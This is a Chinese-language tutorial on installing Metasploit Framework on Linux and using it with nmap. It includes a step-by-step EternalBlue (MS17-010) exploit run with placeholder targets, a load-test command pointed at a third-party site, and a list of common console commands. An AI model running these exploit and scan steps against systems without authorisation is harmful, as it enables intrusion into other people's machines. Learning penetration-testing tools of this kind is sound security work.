Linux.x安装使用Metasploit Framework查找漏洞

  1. 作者QQ:67065435 QQ群:669756510

  2. 本站内容全部为作者原创,转载请注明出处!

安装相关软件

  1. 安装nmap

    yum -y --nogpgcheck install nmap
    nmap <IP>
    
  2. 安装httpd-tools

    yum -y --nogpgcheck install httpd-tools
    ab -c 10 -n 10 https://www.baidu.com/
    
  3. 安装MSF

    1. 从以下链接获取rpm包
    https://rpm.metasploit.com/
    
    2. 安装上一步获取的rpm包
    rpm -ivh metasploit-framework-6.4.4+20240415102613~1rapid7-1.el6.x86_64.rpm
    
    3. 修改用户
    chown -R www:www /opt/metasploit-framework
    
    4. 查看版本
    msfconsole -v
    
  4. 连接postgresql

    su www
    cd ~
    msfconsole
    db_status
    color -h
    banner -h
    connect -h
    bundle install
    ;👇这里使用msfdb init👇
    msfdb init|start|stop|reinit|delete
    
  5. nmap开放端口

    db_nmap <IP>
    
  6. 永恒之蓝示例

    # 使用 永恒之蓝 模块
    use exploit/windows/smb/ms17_010_eternalblue
    
    # 查看模块支持参数
    show options
    
    # 设置模块参数
    set RHOSTS  <IP>
    set RPORT   <PORT>
    set LHOSTS  <IP>
    set LPORT   <PORT>
    
    # 查看模块参数
    show options
    
    # 运行 HTTP弱点扫描 模块
    run|exploit
    

msf常用指令

  1. msf常用指令

    # 搜索模块
    msf> search name:<模块名称的一部分>
    msf> search type:all|encoders|nops|exploits|payloads|auxiliary|post|plugins|info|options|favorites
    msf> search name:<模块名称的一部分> type:all|encoders|nops|exploits|payloads|auxiliary|post|plugins|info|options|favorites
    
    # 展示模块
    msf> show all|encoders|nops|exploits|payloads|auxiliary|post|plugins|info|options|favorites
    
    # 使用模块
    msf> use <模块名称>
    
    # 退出模块
    msf> back
    
    # 模块信息
    msf> info <模块名称>
    
    # 检查指定IP是否存在漏洞
    msf> use <模块名称>
    msf> check <IP>
    
    # 执行.rc文件
    msf> resource <.rc文件路径>
    
    # 查看数据库连接状态
    msf> db_status
    
    # 创建数据库连接
    msf> db_connect
    
    # 关闭数据库连接
    msf> db_disconnect
    
    # 退出msf控制台
    msf> exit
    
  2. 官方教程

Copyright © 鲸小鱼 2012-∞ all right reserved,powered by Gitbook修订: 2000-10-10 00:00

results matching ""

    No results matching ""